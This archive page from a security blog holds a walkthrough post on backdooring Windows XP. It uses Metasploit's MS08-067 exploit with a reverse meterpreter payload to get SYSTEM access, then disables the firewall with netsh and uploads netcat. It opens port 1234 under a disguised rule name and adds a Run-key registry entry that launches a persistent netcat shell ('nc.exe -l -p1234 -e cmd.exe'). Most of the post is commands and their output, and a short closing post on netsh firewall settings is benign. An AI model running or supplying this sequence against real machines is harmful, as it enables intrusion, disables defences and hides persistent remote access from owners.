Archive for the ‘FireWall’ Category

control – windows firewall from the command line

Czerwiec 7, 2012 Dodaj komentarz

Creating a Netcat Backdoor on a Windows XP

Czerwiec 6, 2012 2 uwag

Creating a Netcat  Backdoor on a Windows XP 

Netcat is a versatile tool that can perform a multitude of TCP/IP functions. One very useful feature, particularly for a penetration tester, is the ability to shovel a shell from one system to another. In this section, we’ll use this feature to access a remote backdoor on a Windows XP (Firewall is ON ) system. A backdoor is a communication channel that will provide us with a remote command shell of a previously exploited system (victim), allowing us to access the system at a later time. In this section, I will demonstrate various ways to use and create a backdoor on a Windows XP (Firewall is ON )  victim host.

Run Metasploit Console :

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ — –=[ 869 exploits – 480 auxiliary – 144 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
       =[ svn r15401 updated today (2012.06.07)

Scan Target with nmap

msf > namp
[-] Unknown command: namp.
msf > nmap
[*] exec: nmap
Nmap scan report for
Host is up (0.00s latency).
Not shown: 998 filtered ports
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds    # OPEN !!!

Choose exploit for the target ( Windows XP EN SP2 )

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:

   Id  Name
   —  —-
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)

Choose payload for the target ( Windows XP EN SP2 )

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST
msf  exploit(ms08_067_netapi) > set LHOST

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ——–  ———–
   RHOST  yes       The target address
   RPORT    445                         yes       Set the SMB service port    # This Port is Open !!!
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   —-      —————  ——–  ———–
   EXITFUNC  thread               yes       Exit technique: seh, thread, process, none
   LHOST    yes       The listen address
   LPORT     4444                       yes       The listen port

Exploit target:

   Id  Name
   —  —-
   0   Automatic Targeting

Exploit ( Windows XP EN SP2 )

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2012-06-07 13:28:59 +0200


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   # SYSTEM !!!!!
meterpreter > shell
Process 240 created.
Channel 1 created.

Runing shell on Windows XP and  DISABLE Firewall:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Netsh firewall set opmode disable         # Disable FireWall
Netsh firewall set opmode disable
Ok.                                                           # It's OK - FireWall is OFF

In the next step we return to meterpreter and upload netcat to Windows XP:

meterpreter > upload c:\\tools\\nc.exe c:\\windows\\system32\\   # Upload netcat from my local machine to windows xp
[*] uploading  : c:\tools\nc.exe -> c:\windows\system32\
[*] uploaded   : c:\tools\nc.exe -> c:\windows\system32\\nc.exe   # Upload status – Ok

meterpreter > shell
Process 976 created.
Channel 3 created.

Open new TCP Port – No.1234

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode          # show firewall stsus
netsh firewall show opmode

Domain profile configuration:
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
Operational mode                  = Disable               # firewall is OFF
Exception mode                    = Enable

Local Area Connection firewall configuration:
Operational mode                  = Enable

C:\WINDOWS\system32>Netsh firewall set opmode mode = enable exceptions = enable
profile = all
Netsh firewall set opmode mode = enable exceptions = enable profile = all
Ok. # Firewall is On and excepions enable

C:\WINDOWS\system32>netsh firewall add portopening TCP 1234 "Windows Firewall Reporting
netsh firewall add portopening TCP 1234 "Windows Firewall Reporting
Agent" enable all
Ok.     # Open TCP port 1234

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting   # my new port
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Install Windows BackDoor Shell

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

The operation completed successfully  # It's OK!



Now the next time a user logs on to the system, the Netcat backdoor command is triggered and sends a command prompt to our attack system.

And …

wmic:root\cli>startup list full
Command=c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe  # not hiden
User=All Users

Working OR Not ?

from another machine, run…

c:\tools>nc -v 1234
CASH-F32CDFF50A [] 1234 (?) open

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\metasploit>

It’s working !!!


Kategorie:BackDoor, FireWall

Using Netsh with Windows XP And Windows 2003 Firewall

Marzec 11, 2012 1 komentarz

Using Netsh with Windows XP And Windows 2003 Firewall

This post examines how to configure Windows Firewall using the Netsh command line utility. The procedures covered apply to both the Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1 operating system platforms.

Windows XP Service Pack 2 (SP2) ( Windows Server 2003 Service Pack 1 (SP1) ) includes the Windows Firewall, a replacement for the feature previously known as the Internet Connection Firewall (ICF).Windows Firewall is a stateful host firewall that drops all unsolicited incoming traffic that does not correspond to either traffic sent in response to a request of the computer or unsolicited traffic that has been specified as allowed.

Comamand Line Configure Windows Firewall step-by-step


Default settings is shown in the following figure.


windows firewall general

  • On (recommended)
    Select to enable Windows Firewall for all of the network connections that are selected on the Advanced tab. Windows Firewall is enabled to allow only solicited and excepted incoming traffic. Excepted traffic is configured on the Exceptions tab.
  • Don’t allow exceptions
    Click to allow only solicited incoming traffic. Excepted incoming traffic is not allowed. The settings on the Exceptions tab are ignored and all of the network connections are protected, regardless of the settings on the Advanced tab.
  • Off (not recommended)
    Select to disable Windows Firewall. This is not recommended, especially for network connections that are directly accessible from the Internet, unless you are already using a third-party host firewall product.

Strony: 1 2 3